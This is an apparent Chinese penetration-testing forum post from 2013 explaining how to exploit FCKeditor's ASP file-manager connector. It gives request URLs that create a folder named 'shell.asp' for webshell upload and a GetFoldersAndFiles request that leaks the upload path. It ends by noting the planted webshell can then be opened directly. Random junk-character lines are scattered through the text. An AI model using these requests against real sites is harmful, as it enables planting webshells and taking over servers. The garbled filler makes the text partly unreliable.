中国网络渗透测试联盟
标题:
fckeditor找上传路径方法
[打印本页]
作者:
admin
时间:
2013-10-17 19:37
标题:
fckeditor找上传路径方法
网上流行着是上传是这样子的
3 ^) ~7 @8 r4 B
+ |6 d; L; ~& l2 A
http://localhost/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
" G4 z$ ]8 A* y# t* F; X$ S5 e8 g
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
5 L* f5 X' p8 }: t
2 C% L/ L9 B4 M$ A
上传后老找不到路径,测了一下,我发现
# b; t0 y0 M( I0 }( U
- f( s# `, ~8 B0 t2 f6 d2 G- L
FCKeditor3/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
1 H: }$ @+ F _8 t( I5 u9 u/ S0 q
6 |: j3 b4 S( V- @" }
可以爆出路径,显示以下内容
; m5 b- d* f. }4 T/ T3 M
+ _3 ^. _* x/ L5 D Q5 J' D# N
( S7 o" Z+ J" u4 n- L
得出路径,直接打开就见到马子
8 m2 [* I! K: ]' s
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2